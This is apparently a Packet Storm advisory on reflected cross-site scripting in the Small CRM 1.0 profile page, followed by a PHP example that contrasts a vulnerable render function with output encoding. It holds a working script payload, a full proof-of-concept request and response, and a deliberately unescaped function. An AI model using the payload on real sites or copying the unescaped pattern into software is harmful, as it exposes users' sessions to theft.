Packet Storm ID: PACKETSTORM:178958 (Furkan Eren Tetik), published Jun 06, 2024

Small CRM 1.0 Cross Site Scripting

2024-06-06 00:00:00
Furkan Eren Tetik
packetstormsecurity.com
small crm
cross site scripting
php
mysql
reflected
windows 11
kali linux
vulnerability
xss
sql injection
security breach

AI Score: 7.4 High
Confidence: Low

```text
# Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected)
# Date: 05.06.2024
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads
# Software Link: https://phpgurukul.com/small-crm-php
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Description: The Small CRM profile page echoes submitted form values back into the HTML without encoding, so a simple script payload executes in the browser (reflected XSS)
# https://www.linkedin.com/in/furkanerentetik/


Steps To Reproduce:
1 - Log in and open the profile page http://localhost/crm/crm/profile.php
2 - Submit the form with the following payload in the "name" field: "><script>alert(document.cookie)</script>
3 - Press Enter; the alert dialog appears.


PoC

Request

POST /crm/crm/profile.php HTTP/1.1
Host: localhost
Content-Length: 674
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/crm/crm/profile.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1
Connection: close

------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="name"

"><script>alert(document.cookie)</script>
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="alt_email"


------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="phone"

0000000000
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="gender"

m
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="address"

deneme
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="update"

Update
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW--


----------------------------------------------------------------------------------------------

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jun 2024 22:22:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13521

<script>alert('Your profile updated successfully.');</script>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<title>CRM | User Profile</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />

<link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/jquery-scrollbar/jquery.scrollbar.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
</head>
<body class="">
<div class="header navbar navbar-inverse ">
<div class="navbar-inner">
<div class="header-seperation">
<ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none">
<li class="dropdown"> <a id="main-menu-toggle" href="#main-menu" class="" >
<div class="iconset top-menu-toggle-white"></div>
</a> </li>
</ul>
<a href="dashboard.php" style="color:#FFF; font-size:24px; margin-top:20%;">CRM</a>
<ul class="nav pull-right notifcation-center">
<li class="dropdown" id="header_task_bar"> <a href="dashboard.php" class="dropdown-toggle active" data-toggle="">
<div class="iconset top-home"></div>
</a> </li>

</ul>
</div>
<div class="header-quick-nav" >
<div class="pull-left">


</div>
<div class="pull-right">
<ul class="nav quick-section ">
<li class="quicklinks"> <a data-toggle="dropdown" class="dropdown-toggle pull-right " href="#" id="user-options">
<div class="iconset top-settings-dark "></div>
</a>
<ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options">
<li><a href="profile.php"> My Account</a> </li>
<li class="divider"></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i>&nbsp;&nbsp;Log Out</a></li>
</ul>
</li>

</ul>
</div>
<!-- END CHAT TOGGLER -->
</div>
<!-- END TOP NAVIGATION MENU -->
</div>
<!-- END TOP NAVIGATION BAR -->
</div>
<!-- END HEADER --><div class="page-container row-fluid">
<!-- BEGIN SIDEBAR -->
<div class="page-sidebar" id="main-menu">
<!-- BEGIN MINI-PROFILE -->
<div class="page-sidebar-wrapper scrollbar-dynamic" id="main-menu-wrapper">
<div class="user-info-wrapper">
<div class="profile-wrapper"> <img src="assets/img/user.png" alt="" data-src="assets/img/user.png" data-src-retina="assets/img/user.png" width="69" height="69" /> </div>
<div class="user-info">
<div class="greeting" style="font-size:14px;">Welcome</div>
<div class="username" style="font-size:12px;">fet</div>
<div class="status" style="font-size:10px;"><a href="#">
<div class="status-icon green"></div>
Online</a></div>
</div>
</div>
<!-- END MINI-PROFILE -->
<!-- BEGIN SIDEBAR MENU -->
<p class="menu-title">BROWSE <span class="pull-right"><a href="javascript:;"><i class="fa fa-refresh"></i></a></span></p>

<ul>
<li class="start"> <a href="dashboard.php"> <i class="icon-custom-home"></i> <span class="title">Dashboard</span> <span class="selected"></span> </a>
</li>

<li><a href="change-password.php"><span class="fa fa-file-text-o"></span> Change Password</a></li>
<li><a href="profile.php"><span class="fa fa-user"></span> Profile</a></li>


<li ><a href="get-quote.php"> <span class="fa fa-tasks"></span> Request a Quote</a></li>
<li ><a href="create-ticket.php"><span class="fa fa-ticket"></span> Create Ticket</a></li>
<li ><a href="view-tickets.php"><span class="fa fa-ticket"></span> View Ticket</a></li>

</ul>

<div class="clearfix"></div>
</div>
</div>
<a href="#" class="scrollup">Scroll</a>
<div class="footer-widget">
<div class="progress transparent progress-small no-radius no-margin">
<div data-percentage="79%" class="progress-bar progress-bar-success animate-progress-bar" ></div>
</div>
<div class="pull-right">
</div>
</div>
<div class="page-content">
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="page-title">
<h3>fet's Profile</h3>

<div class="row">
<div class="col-md-12">

<form class="form-horizontal" method="post" enctype="multipart/form-data">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><strong>Your Profile</h3>
<div align="right">
Registration Date :2024-06-05 01:16:29
</div>
</div>

<div class="panel-body">

<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Name</label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="name" value=""><script>alert(1)</script>" class="form-control"/>
</div>

</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Primary Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="email" value="[email protected]" disabled="disabled" class="form-control"/>
</div>

</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">alternate Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="alt_email" value="" class="form-control"/>
</div>

</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Contact no </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="phone" value="0000000000" maxlength="10" class="form-control"/>
</div>


</div>
</div>


<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Gender </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<select class="form-control select" name="gender">
<option value="m">Male</option>
<option value="m">Male</option>
<option value="f">Female</option>
<option value="others">Other</option>
</select>
</select>
</div>

</div>
</div>




<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Address</label>
<div class="col-md-6 col-xs-12">
<textarea class="form-control" name="address" rows="5">"><script>alert(1)</script></textarea>

</div>
</div>







</div>
<div class="panel-footer">
<button class="btn btn-default" type="reset">Clear Form</button>
<input type="submit" value="Update" name="update" class="btn btn-primary pull-right">
</div>
</div>
</form>

</div>
</div>


</div>
</div>
</div>

</div>
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-scrollbar/jquery.scrollbar.min.js" type="text/javascript"></script>
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>

</body>
</html>
```
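The captured response shows where the defect sits: the submitted `name` value is written straight into `value="..."` on the profile form, and the `address` value straight into a `<textarea>`, so a leading `">` closes the attribute and the rest of the input becomes markup. The following PHP is an added example written for this page, not code from the Small CRM project or from the advisory author. It assumes (hypothetically, since the project source is not shown here) that profile.php renders the field with an unescaped `echo`, reproduces that pattern beside the context-correct fix, and runs the advisory's own payload through both.

```php
<?php
// Added example, not part of the Small CRM project or the advisory.
// Assumption: profile.php builds the input with an unescaped echo, e.g.
//   value="<?php echo $row['name']; ?>"
// which matches the captured response. Function names below are hypothetical.

declare(strict_types=1);

// Vulnerable pattern: user-controlled data concatenated into an HTML
// attribute. A double quote in $name closes the attribute and everything
// after it is parsed as markup by the browser.
function renderNameInputVulnerable(string $name): string
{
    return '<input type="text" name="name" value="' . $name . '" class="form-control"/>';
}

// Hardened pattern: encode for the HTML attribute / text context at output.
// ENT_QUOTES escapes both " and ', ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently producing an empty string, and the charset must match the page's.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function renderNameInputHardened(string $name): string
{
    return '<input type="text" name="name" value="' . e($name) . '" class="form-control"/>';
}

// The same defect is visible for the address field, rendered as <textarea>
// text content. The same encoder applies: an unescaped "</textarea>" in the
// value would otherwise terminate the element early.
function renderAddressHardened(string $address): string
{
    return '<textarea class="form-control" name="address" rows="5">' . e($address) . '</textarea>';
}

// Constructed sample input: the payload from the advisory's request body.
$payload = '"><script>alert(document.cookie)</script>';

$vulnerable = renderNameInputVulnerable($payload);
$hardened   = renderNameInputHardened($payload);

echo "Vulnerable output:\n", $vulnerable, "\n\n";
echo "Hardened output:\n", $hardened, "\n\n";
echo "Hardened textarea:\n", renderAddressHardened($payload), "\n\n";

// Regression check worth keeping in the project's test suite: the encoded
// output must still be one well-formed attribute, i.e. no '<' from the input
// survives and the only double quotes are the eight the template itself emits.
$stillInjectable = str_contains($vulnerable, '"><script>');
$safe            = !str_contains($hardened, '<script>')
                && substr_count($hardened, '"') === 8;

echo 'Vulnerable template injectable: ', var_export($stillInjectable, true), "\n";
echo 'Hardened template safe:         ', var_export($safe, true), "\n";
```

Run it with `php example.php` on the PHP 8 the captured response reports (`str_contains` needs PHP 8.0 or later). The point a reviewer should take from it is that the fix belongs at output time and is context-specific: validating the name on input is a useful second layer, but every place a stored or reflected value is written into HTML needs the encoder for that context, which is why both the `value` attribute and the `<textarea>` in the response reflect the same payload.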
